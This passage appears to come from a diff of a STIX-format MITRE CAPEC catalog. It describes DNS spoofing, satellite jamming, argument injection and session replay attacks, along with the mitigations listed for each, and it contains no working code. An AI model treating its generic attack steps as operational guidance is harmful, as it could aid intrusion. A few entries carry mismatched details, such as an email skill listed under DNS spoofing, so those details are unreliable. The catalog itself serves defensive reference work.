"created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d22787d-6e79-4bd5-8fb5-a6b95e74fc40", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--571be573-775a-4c2e-b74d-01d1a1a56a8a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach.", + "id": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-597-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4be0c7a-12b3-47bb-9012-e6800e680e58", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record) response to a target's route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the target's DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the target's infrastructure uses.", + "external_references": [ + { + "external_id": "CAPEC-598", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/598.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Anonymous, Towards a Comprehensive Picture of the Great Firewall's DNS Censorship, 2014, USENIX", + "external_id": "REF-479", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record ) response before a legitimate resolver can.", + "Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\"NXDOMAIN\" (\"No such domain\")code, or a DNS record) response before a legitimate resolver can." + ], + "x_capec_prerequisites": [ + "On/In Path Device" + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Avoid dependence on DNS", + "id": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae2e6105-d7fc-4e98-9dea-4493606440c6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fbf3499-e8c7-452e-87c7-9bd2e4733100", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a .onion domain with Tor support", + "id": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f5c44bc-4c83-4819-add3-4fc2f11b2fde", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNSSEC", + "id": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c28461d-523b-453f-99b1-a60849c2db18", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNS-hold-open", + "id": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13141463-336a-4b22-955f-de061f868998", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary transmits disruptive signals in the direction of the target's consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.", + "external_references": [ + { + "external_id": "CAPEC-599", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/599.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521fbe1c-28d6-4ca0-bc8b-6e2dbc91332e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Terrestrial Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "\n A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.\n The adversary must know the location of the target satellite dish.\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.", + "external_references": [ + { + "external_id": "CAPEC-6", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Jouko Pynnonen, Java Web Start argument injection vulnerability", + "external_id": "REF-482", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/393696" + } + ], + "id": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Argument Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery of potential injection vectors: Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).

    2. Techniques
    Manually cover the application and record the possible places where arguments could be passed into external systems.
    Use a spider, for web applications, to create a list of URLs and associated inputs.

Experiment

  1. 1. Attempt variations on argument content: Possibly using an automated tool, the attacker will perform injection variations of the arguments.

    2. Techniques
    Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).
    Use a proxy tool to record results, error messages and/or log if accessible.

Exploit

  1. Abuse of the application: The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.

    2. Techniques
    Manually inject specific payload into targeted argument.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.", + "Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--196a8c07-3041-48df-97b8-d20a2bf800b7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.", + "id": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3192605-c8b0-48c6-a253-ced90d7fe3e0", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba5cb3e3-2de4-49cd-a6c0-587480f23acd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.", + "external_references": [ + { + "external_id": "CAPEC-60", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/60.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Access Token Manipulation:Token Impersonation/Theft", + "external_id": "T1134.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134/001" + }, + { + "description": "Use Alternate Authentication Material:Web Session Cookie", + "external_id": "T1550.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/004" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reusing Session IDs (aka Session Replay)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428", + "Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker interacts with the target host and finds that session IDs are used to authenticate users.

  2. The attacker steals a session ID from a valid user.

Exploit

  1. The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are not well protected from session theft." + ], + "x_capec_skills_required": { + "Low": "If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.", + "Medium": "More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always invalidate a session ID after the user logout.", + "id": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--908e8d74-13d5-49a7-ac4c-99df0daf47f0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Setup a session time out for the session IDs.", + "id": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f28d834-ffd7-4c6d-ad68-e70a69745dc9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).", + "id": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb55e2e4-e6f7-45ee-9ae9-fd7631b85a05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.", + "id": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71ab000c-de21-4717-95f9-4aae387d2d7c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session data associated with the session ID.", + "id": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5dc170d-4034-4559-acd3-ad3cfff69416", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multifactor authentication.", + "id": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f886c45-625d-4dd6-9659-8b92fdb432e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": 